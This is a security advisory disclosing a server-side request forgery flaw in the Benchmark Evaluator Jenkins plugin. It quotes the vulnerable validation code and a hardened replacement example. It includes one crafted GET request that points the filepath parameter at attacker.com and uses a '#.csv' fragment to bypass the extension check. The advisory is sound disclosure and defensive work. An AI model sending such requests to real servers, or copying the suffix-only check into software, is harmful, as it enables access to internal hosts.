Coordinated Disclosure Timeline
- 2023-04-11: Issue reported to the Jenkins Security team.
- 2023-07-12: Advisory published (no fix available).
Summary
A Server-Side Request Forgery (SSRF) vulnerability was found in the benchmark-evaluator-plugin. The vulnerability resides in the io.jenkins.plugins.benchmark.BenchmarkBuilder#doCheckFilepath method and can be exploited without authentication. An attacker can leverage this vulnerability to send requests to arbitrary hosts.
Product
Benchmark Evaluator Jenkins plugin
Tested Version
Details
SSRF in io.jenkins.plugins.benchmark.BenchmarkBuilder#doCheckFilepath (GHSL-2023-073)
The doCheckFilepath method in the BenchmarkBuilder.java file lacks proper validation and sanitization of user input for the ctrlUrl parameter, allowing a blind exploitation of a server-side request forgery (SSRF).
Affected source code: BenchmarkBuilder.java
    public FormValidation doCheckFilepath(@QueryParameter String filepath) throws IOException, ServletException {
        ...
        // The only validation is a suffix check; a URL such as "http://host/#.csv" satisfies it.
        for (String end : BenchmarkResults.endings) {
            if (filepath.toLowerCase().endsWith("." + end)) {
                ending = end;
            }
        }
        Map<String, Double> m = null;
        try {
            // The user-supplied value is opened and read during form validation,
            // without any permission check on the caller.
            ReadResult r = new BenchmarkResults(filepath).read();
            ....
        }
        ...
In order to exploit the vulnerability, an attacker may send the following crafted request:
GET /jenkins/descriptorByName/io.jenkins.plugins.benchmark.BenchmarkBuilder/checkFilepath?filepath=http%3A%2F%2Fattacker.com/%23.csv HTTP/1.1
Host: localhost:8080
Connection: close
This vulnerability was found using CodeQL’s SSRF Java query.
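As an added illustration of how a form-validation method like this is normally hardened in a Jenkins plugin, the following Java method is example code written for this advisory, not the plugin's own fix. It follows the standard Jenkins pattern for validation endpoints: restrict the method to POST, require Item.CONFIGURE on the enclosing item, reject values that carry a URI scheme before any suffix check, and never perform I/O on the user-supplied value during validation. The class name, the ALLOWED_ENDINGS list and the error messages are constructed for the example; the plugin's real BenchmarkResults.endings list is not reproduced here.

```java
import java.io.IOException;
import java.util.regex.Pattern;

import hudson.model.Item;
import hudson.util.FormValidation;
import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.verb.POST;

// Hypothetical hardened validator; not code from the benchmark-evaluator-plugin.
public class HardenedFilepathCheck {

    // Constructed list of accepted result-file extensions for this example.
    private static final String[] ALLOWED_ENDINGS = {"csv", "json", "xml"};

    // Matches "scheme:..." where the scheme has at least two characters, so
    // "http:", "https:", "file:" and "ftp:" are caught but a Windows drive
    // letter such as "C:\results.csv" is not.
    private static final Pattern URI_SCHEME = Pattern.compile("(?i)^[a-z][a-z0-9+.-]+:");

    @POST  // validation must not be reachable via GET (CSRF hardening)
    public FormValidation doCheckFilepath(@AncestorInPath Item item,
                                          @QueryParameter String filepath) throws IOException {
        // 1. Permission check. Returning ok() rather than error() for callers without
        //    CONFIGURE avoids turning the endpoint into an unauthenticated oracle.
        if (item == null || !item.hasPermission(Item.CONFIGURE)) {
            return FormValidation.ok();
        }
        if (filepath == null || filepath.trim().isEmpty()) {
            return FormValidation.error("Please provide a workspace-relative file path.");
        }
        // 2. Reject anything carrying a URI scheme. The original suffix-only check let
        //    "http://host/#.csv" through because the fragment ends in ".csv".
        if (looksLikeUri(filepath)) {
            return FormValidation.error("Remote URLs are not allowed; provide a workspace-relative path.");
        }
        // 3. Reject traversal so a later read cannot escape the workspace.
        if (filepath.contains("..")) {
            return FormValidation.error("Path must not contain '..'.");
        }
        // 4. Apply the extension check only after the value is known to be a plain path.
        if (!hasAllowedEnding(filepath)) {
            return FormValidation.error("Unsupported file type.");
        }
        // 5. Do not open or read the file here; validation reports on the string only.
        return FormValidation.ok();
    }

    static boolean looksLikeUri(String value) {
        return URI_SCHEME.matcher(value).find();
    }

    static boolean hasAllowedEnding(String path) {
        String lower = path.toLowerCase();
        for (String end : ALLOWED_ENDINGS) {
            if (lower.endsWith("." + end)) {
                return true;
            }
        }
        return false;
    }
}
```

The ordering matters: the scheme check runs before the extension check so that a fragment or query string appended to a URL cannot satisfy the suffix test, and the actual read of the file is deferred to the build step, where it runs with the job's own workspace and permissions rather than at validation time on behalf of an arbitrary HTTP client.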
Impact
This issue may lead to server-side request forgery.
CVE
- CVE-2023-37962 (CSRF)
- CVE-2023-37963 (missing permission check)
Resources
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-073 in any communication regarding this issue.